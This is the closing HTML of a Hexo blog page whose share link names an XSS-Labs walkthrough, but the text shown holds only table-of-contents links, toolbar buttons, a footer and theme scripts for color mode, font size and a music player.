class="toc-list-text">level15</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#level16"><span class="toc-list-text">level16</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#level17"><span class="toc-list-text">level17</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#level18"><span class="toc-list-text">level18</span></a></li></ol></div></div></aside></div></div><div id="toolbar" hide=""><div id="toolbar-setting-container" hide=""><div class="toolbar-item"><button id="tool-color-mode" title="Dark Mode" type="button"><img src="/assets/images/svg/ta/ta-moon.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button class="copy-text" id="tool-share" title="Share" type="button" data-text="http://example.com/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/"><img src="/assets/images/svg/ta/ta-share.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-font-size-plus" title="Increase Font Size" type="button"><img src="/assets/images/svg/ta/ta-text-plus.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-font-size-minus" title="Decrease Font Size" type="button"><img src="/assets/images/svg/ta/ta-text-minus.svg" class="icon noview" alt="Icon"></button></div></div><div class="toolbar-container"><div class="toolbar-item"><button id="tool-setting" title="Settings" type="button"><img src="/assets/images/svg/ta/ta-setting.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-toc" title="Table Of Content" type="button"><img src="/assets/images/svg/ta/ta-toc.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-gototop" title="Go To Top" type="button"><img src="/assets/images/svg/ta/ta-up.svg" class="icon noview" alt="Icon"></button></div></div></div><div id="music-player"></div></main><footer><div class="footer"><div id="footer-copyright">© 2026 <span>💗</span> <a href="/about#%20Url%20for%20the%20link%20of%20author">月岛</a></div><div id="footer-info"><div id="footer-framework">🚀Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/chanwj/hexo-theme-meow" title="3.3.1" target="_blank">Meow</a></div><div id="footer-runtime"><span id="runtime" data-startdate="2026-03-05T22:16:20.000Z">🌻Blog Runtime: . Years . Months . Days</span></div></div><div id="footer-pageview"></div></div></footer><div class="scripts"><script>const GLOBALCONFIG = {
  root: '/',
  toolbar: true,
  lazyload_src: '/assets/images/Meow-Loading.webp',
  friends: false,
  album: '',
  codeblock: true,
  code_copy_text: false,
  share_text: '',
  onblur_title: 'Please Come Back～✧(´▽`ʃ♡ƪ)',
  mouse_click: false,
  notify:{
    enable: true,
    info: 'Copied successfully! Please mark the address of this post if redistribute.',
    f12_info: 'Turned on developer mode, please follow the copyright license of this website'
  },
  search: {
    enable: false,
    path: '',
    local: {
      top_n_per_article: 1,
      preload: false
    }
  },
  encrypt: false,
};
</script><script>if (!localStorage.getItem('color-mode')) {
  localStorage.setItem('color-mode', 'light' || 'light');
}
document.body.setAttribute('data-mode', localStorage.getItem('color-mode'));
</script>
<script src="/js/theme/tools/utils.js"></script>

<script src="/js/plugins/dist/lazyload.min.js"></script>

<script src="/js/plugins/view-image.min.js"></script>
<script src="https://events.vercount.one/js" defer="defer"></script><script>if (localStorage.getItem('font-size')) {
  document.querySelector('.post').style.fontSize = localStorage.getItem('font-size') + 'px';
}
</script>
<script src="/js/plugins/dist/APlayer.min.js"></script>
<script>const initAplayer = (data) => {
  if (!data.length) return;

  const ap = new APlayer({
    container: document.getElementById('music-player'),
    fixed: true,
    autoplay: false,
    theme: '#FFB347',
    loop: 'all',
    order: 'list',
    volume: 0.7,
    lrcType: 3,
    audio: data
  });

  ap.on('play', () => {
    document.getElementById('music-player').setAttribute("play", "");
  });
  ap.on('pause', () => {
    document.getElementById('music-player').removeAttribute("play");
  });
};

const fetchData = () => {
  fetch('')
    .then(res => res.json())
    .then(result => initAplayer(result));
};

if ('') {
  document.addEventListener("DOMContentLoaded", fetchData);
} else {
  document.addEventListener("DOMContentLoaded", initAplayer());;
}</script>
<script src="/js/plugins/dist/snackbar.min.js"></script>

<script src="/js/main.js" type="module"></script>
</div></body></html>